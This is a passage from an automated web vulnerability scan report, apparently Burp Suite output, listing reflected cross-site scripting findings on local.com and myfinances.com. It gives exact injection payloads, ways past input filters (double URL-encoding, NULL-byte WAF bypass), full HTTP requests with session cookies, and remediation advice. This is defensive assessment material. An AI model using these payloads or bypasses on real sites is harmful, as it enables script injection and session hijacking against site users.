This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the t request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cf3d9"style%3d"x%3aexpression(alert(1))"9c6370ca462 was submitted in the t parameter. This input was echoed as cf3d9"style="x:expression(alert(1))"9c6370ca462 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The value of the zone request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 15298%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253effbd7ca082c was submitted in the zone parameter. This input was echoed as 15298"><script>alert(1)</script>ffbd7ca082c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the zone request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /dart/?ag=True&css=banner&p=locm.sp&pos=1&t=1&sz=728x90&ord=1296748812638&k=banks&l=Dallas%2c+TX&cat=cat%3dfinancial_services&zone=locm.sp%2fretail_banks_1502010015298%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253effbd7ca082c HTTP/1.1 Host: www.local.com Proxy-Connection: keep-alive Referer: http://www.local.com/results.aspx?keyword=banks&cid=506c80ba%22style%3d%22x%3aexpression(alert(1))%2245503434253&client=ca-dp-r-mark03_3ph_js Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323183777121350
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Cteonnt-Length: 1107 Vary: Accept-Encoding Date: Thu, 03 Feb 2011 16:25:17 GMT Connection: close Content-Length: 1107
The value of the zone request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fc52c%2527%253balert%25281%2529%252f%252fd85ccbd701b was submitted in the zone parameter. This input was echoed as fc52c';alert(1)//d85ccbd701b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of the zone request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /dart/?ag=True&css=banner&p=locm.sp&pos=1&t=1&sz=728x90&ord=1296748812638&k=banks&l=Dallas%2c+TX&cat=cat%3dfinancial_services&zone=locm.sp%2fretail_banks_15020100fc52c%2527%253balert%25281%2529%252f%252fd85ccbd701b HTTP/1.1 Host: www.local.com Proxy-Connection: keep-alive Referer: http://www.local.com/results.aspx?keyword=banks&cid=506c80ba%22style%3d%22x%3aexpression(alert(1))%2245503434253&client=ca-dp-r-mark03_3ph_js Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323183777121350
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Cteonnt-Length: 1062 Vary: Accept-Encoding Date: Thu, 03 Feb 2011 16:25:17 GMT Connection: close Content-Length: 1062
4.472. http://www.local.com/events/category/music/dallas-tx.aspx [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.local.com
Path:
/events/category/music/dallas-tx.aspx
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8c9e7'-alert(1)-'22f4ee6710f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /events/category/music/dallas-tx.aspx?8c9e7'-alert(1)-'22f4ee6710f=1 HTTP/1.1 Host: www.local.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; k_visit=1; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; s_sq=%5B%5BB%5D%5D; campid=506; ym_pop_freq1421534=1; ym_pop_freq_expiration1421534=Fri, 04 Feb 2011 16:01:44 GMT; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; s_cc=true; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; s_nr=1296748831212; session_start_time=1296748820317; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; SiteLifeHost=SJL01WSITELCL01proddmlocal; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; __utmc=177062200; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utmb=177062200.8.10.1296748820; __qca=P0-30084348-1296748820628;
4.473. http://www.local.com/events/category/performing-arts/dallas-tx.aspx [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.local.com
Path:
/events/category/performing-arts/dallas-tx.aspx
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 60e4c'-alert(1)-'1c8163cafb2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /events/category/performing-arts/dallas-tx.aspx?60e4c'-alert(1)-'1c8163cafb2=1 HTTP/1.1 Host: www.local.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; k_visit=1; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; s_sq=%5B%5BB%5D%5D; campid=506; ym_pop_freq1421534=1; ym_pop_freq_expiration1421534=Fri, 04 Feb 2011 16:01:44 GMT; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; s_cc=true; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; s_nr=1296748831212; session_start_time=1296748820317; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; SiteLifeHost=SJL01WSITELCL01proddmlocal; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; __utmc=177062200; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utmb=177062200.8.10.1296748820; __qca=P0-30084348-1296748820628;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html lang="en-us"> <head> <title>Dallas Theatre and Comedy Eve ...[SNIP]... <a href="/events/events_map.aspx?location=dallas%2c+tx&category=performing_arts&60e4c'-alert(1)-'1c8163cafb2=1" omn_key="EES1:107:1:1118" onclick="return loc_click(this);"> ...[SNIP]...
4.474. http://www.local.com/events/category/sports/dallas-tx.aspx [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.local.com
Path:
/events/category/sports/dallas-tx.aspx
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 66d6b'-alert(1)-'8080df3d42 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /events/category/sports/dallas-tx.aspx?66d6b'-alert(1)-'8080df3d42=1 HTTP/1.1 Host: www.local.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; k_visit=1; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; s_sq=%5B%5BB%5D%5D; campid=506; ym_pop_freq1421534=1; ym_pop_freq_expiration1421534=Fri, 04 Feb 2011 16:01:44 GMT; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; s_cc=true; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; s_nr=1296748831212; session_start_time=1296748820317; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; SiteLifeHost=SJL01WSITELCL01proddmlocal; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; __utmc=177062200; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utmb=177062200.8.10.1296748820; __qca=P0-30084348-1296748820628;
The value of the cid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d27c6"%3b652d94a4b4b was submitted in the cid parameter. This input was echoed as d27c6";652d94a4b4b in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /results.aspx?keyword=banks&cid=506d27c6"%3b652d94a4b4b&client=ca-dp-r-mark03_3ph_js HTTP/1.1 Host: www.local.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the cid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c80ba"style%3d"x%3aexpression(alert(1))"45503434253 was submitted in the cid parameter. This input was echoed as c80ba"style="x:expression(alert(1))"45503434253 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /results.aspx?keyword=banks&cid=506c80ba"style%3d"x%3aexpression(alert(1))"45503434253&client=ca-dp-r-mark03_3ph_js HTTP/1.1 Host: www.local.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the client request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a134f"style%3d"x%3aexpression(alert(1))"fccc9411126 was submitted in the client parameter. This input was echoed as a134f"style="x:expression(alert(1))"fccc9411126 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /results.aspx?keyword=banks&cid=506&client=ca-dp-r-mark03_3ph_jsa134f"style%3d"x%3aexpression(alert(1))"fccc9411126 HTTP/1.1 Host: www.local.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
4.478. http://www.local.com/results.aspx [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.local.com
Path:
/results.aspx
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9a378"style%3d"x%3aexpression(alert(1))"043ffc8a60a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 9a378"style="x:expression(alert(1))"043ffc8a60a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /results.aspx?keyword=banks&cid=506&client=ca-dp-r-mark03_3ph_js&9a378"style%3d"x%3aexpression(alert(1))"043ffc8a60a=1 HTTP/1.1 Host: www.local.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the keyword request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b0f6f"%3bb0022a17af6 was submitted in the keyword parameter. This input was echoed as b0f6f";b0022a17af6 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /topics/?topic=food&keyword=foodb0f6f"%3bb0022a17af6 HTTP/1.1 Host: www.local.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; k_visit=1; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; s_sq=%5B%5BB%5D%5D; campid=506; ym_pop_freq1421534=1; ym_pop_freq_expiration1421534=Fri, 04 Feb 2011 16:01:44 GMT; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; s_cc=true; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; s_nr=1296748831212; session_start_time=1296748820317; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; SiteLifeHost=SJL01WSITELCL01proddmlocal; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; __utmc=177062200; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utmb=177062200.8.10.1296748820; __qca=P0-30084348-1296748820628;
The value of the cb request parameter is copied into the HTML document as plain text between tags. The payload 8cbb2<script>alert(1)</script>2eab8d1e87a was submitted in the cb parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the articleKey request parameter is copied into the HTML document as plain text between tags. The payload 76469<script>alert(1)</script>5cd27d00a02 was submitted in the articleKey parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
4.482. http://www.myfinances.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.myfinances.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload af164"><script>alert(1)</script>bfea6dcd612 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?af164"><script>alert(1)</script>bfea6dcd612=1 HTTP/1.1 Host: www.myfinances.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: acache=0f6ad7bba76fc105e776602dd2eeebb59a5e65ef-96bb1dfba832b3d02f58633d63038a24dcfab136; PHPSESSID=i38rv6rueenlkehkfpegmlf4q3; ARPT=VRWOZXS192.168.100.27CKOUJ; adc=RSP; uvx=ogz9gkn6ApsPfhYM2mO-erklLaxNIV-BVXrW6aRo-n_AJPK2QUOhd0Abjk7C8k0uK8mLPFc-LluxlSpLwBNV_0YhxlQO-o-kf_in1Ri2_CHOcsANvX5k8_r8Rvq_KR_GreyyNfUIbjPAxBUpoNm3wdKSMBYXqgLeYEENLOWsxn5Eble1QxvJLK-74N00-QORgnctmlpQA6dRDOE8qtWYP74CTEiWPaQLH4pwjPOr-md8j6Mr45xQnasoZwBdSfN83QxsFl1X1Wt1Pn-aDBqzVVZjTCYnXgCL;
Response
HTTP/1.1 200 OK Server: Apache P3P: policyref="http://www.myfinances.com/xml/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Type: text/html; charset=UTF-8 Expires: Thu, 03 Feb 2011 17:03:03 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Thu, 03 Feb 2011 17:03:03 GMT Content-Length: 17806 Connection: close Set-Cookie: adc=RSP; path=/;
4.483. http://www.myfinances.com/blog.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.myfinances.com
Path:
/blog.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload b441b'><script>alert(1)</script>2d6ce3f1de5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blog.html?b441b'><script>alert(1)</script>2d6ce3f1de5=1 HTTP/1.1 Host: www.myfinances.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ARPT=VRWOZXS192.168.100.27CKOUJ; PHPSESSID=i38rv6rueenlkehkfpegmlf4q3; acache=0f6ad7bba76fc105e776602dd2eeebb59a5e65ef-96bb1dfba832b3d02f58633d63038a24dcfab136; uvx=ogz9gkn6ApsPfhYM2mO-erklLaxNIV-BVXrW6aRo-n_AJPK2QUOhd0Abjk7C8k0uK8mLPFc-LluxlSpLwBNV_0YhxlQO-o-kf_in1Ri2_CHOcsANvX5k8_r8Rvq_KR_GreyyNfUIbjPAxBUpoNm3wdKSMBYXqgLeYEENLOWsxn5Eble1QxvJLK-74N00-QORgnctmlpQA6dRDOE8qtWYP74CTEiWPaQLH4pwjPOr-md8j6Mr45xQnasoZwBdSfN83QxsFl1X1Wt1Pn-aDBqzVVZjTCYnXgCL; adc=RSP
Response
HTTP/1.1 200 OK Server: Apache P3P: policyref="http://www.myfinances.com/xml/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Type: text/html; charset=UTF-8 Expires: Thu, 03 Feb 2011 16:26:26 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Thu, 03 Feb 2011 16:26:26 GMT Connection: close Vary: Accept-Encoding Set-Cookie: adc=RSP; path=/; Content-Length: 17748
The value of the page request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload %007485b'><script>alert(1)</script>abffe3120a4 was submitted in the page parameter. This input was echoed as 7485b'><script>alert(1)</script>abffe3120a4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /blog.html?page=1%007485b'><script>alert(1)</script>abffe3120a4 HTTP/1.1 Host: www.myfinances.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: acache=0f6ad7bba76fc105e776602dd2eeebb59a5e65ef-96bb1dfba832b3d02f58633d63038a24dcfab136; PHPSESSID=i38rv6rueenlkehkfpegmlf4q3; ARPT=VRWOZXS192.168.100.27CKOUJ; adc=RSP; uvx=ogz9gkn6ApsPfhYM2mO-erklLaxNIV-BVXrW6aRo-n_AJPK2QUOhd0Abjk7C8k0uK8mLPFc-LluxlSpLwBNV_0YhxlQO-o-kf_in1Ri2_CHOcsANvX5k8_r8Rvq_KR_GreyyNfUIbjPAxBUpoNm3wdKSMBYXqgLeYEENLOWsxn5Eble1QxvJLK-74N00-QORgnctmlpQA6dRDOE8qtWYP74CTEiWPaQLH4pwjPOr-md8j6Mr45xQnasoZwBdSfN83QxsFl1X1Wt1Pn-aDBqzVVZjTCYnXgCL;
Response
HTTP/1.1 200 OK Server: Apache P3P: policyref="http://www.myfinances.com/xml/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Type: text/html; charset=UTF-8 Expires: Thu, 03 Feb 2011 17:01:58 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Thu, 03 Feb 2011 17:01:58 GMT Content-Length: 17623 Connection: close Set-Cookie: adc=RSP; path=/;
4.485. http://www.myfinances.com/blog/3171093.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.myfinances.com
Path:
/blog/3171093.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9e47d"><script>alert(1)</script>cddac6d471e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blog/3171093.html?9e47d"><script>alert(1)</script>cddac6d471e=1 HTTP/1.1 Host: www.myfinances.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: acache=0f6ad7bba76fc105e776602dd2eeebb59a5e65ef-96bb1dfba832b3d02f58633d63038a24dcfab136; PHPSESSID=i38rv6rueenlkehkfpegmlf4q3; ARPT=VRWOZXS192.168.100.27CKOUJ; adc=RSP; uvx=ogz9gkn6ApsPfhYM2mO-erklLaxNIV-BVXrW6aRo-n_AJPK2QUOhd0Abjk7C8k0uK8mLPFc-LluxlSpLwBNV_0YhxlQO-o-kf_in1Ri2_CHOcsANvX5k8_r8Rvq_KR_GreyyNfUIbjPAxBUpoNm3wdKSMBYXqgLeYEENLOWsxn5Eble1QxvJLK-74N00-QORgnctmlpQA6dRDOE8qtWYP74CTEiWPaQLH4pwjPOr-md8j6Mr45xQnasoZwBdSfN83QxsFl1X1Wt1Pn-aDBqzVVZjTCYnXgCL;
Response
HTTP/1.1 200 OK Server: Apache P3P: policyref="http://www.myfinances.com/xml/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Type: text/html; charset=UTF-8 Expires: Thu, 03 Feb 2011 17:05:23 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Thu, 03 Feb 2011 17:05:23 GMT Content-Length: 13431 Connection: close Set-Cookie: adc=RSP; path=/;
<head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <meta name="generator" content="1b0d0ec2fefe4b82a285 ...[SNIP]... <a target="_blank" href="http://twitter.com/home?status=Check out this 'How The Dow Jones Industrial Average Is Calculated' on 'MyFinances.com'! 'http://www.myfinances.com/blog/3171093.html?9e47d"><script>alert(1)</script>cddac6d471e=1'"> ...[SNIP]...
4.486. http://www.myfinances.com/blog/3171103.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.myfinances.com
Path:
/blog/3171103.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5c279"><script>alert(1)</script>be8d26e1d8b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
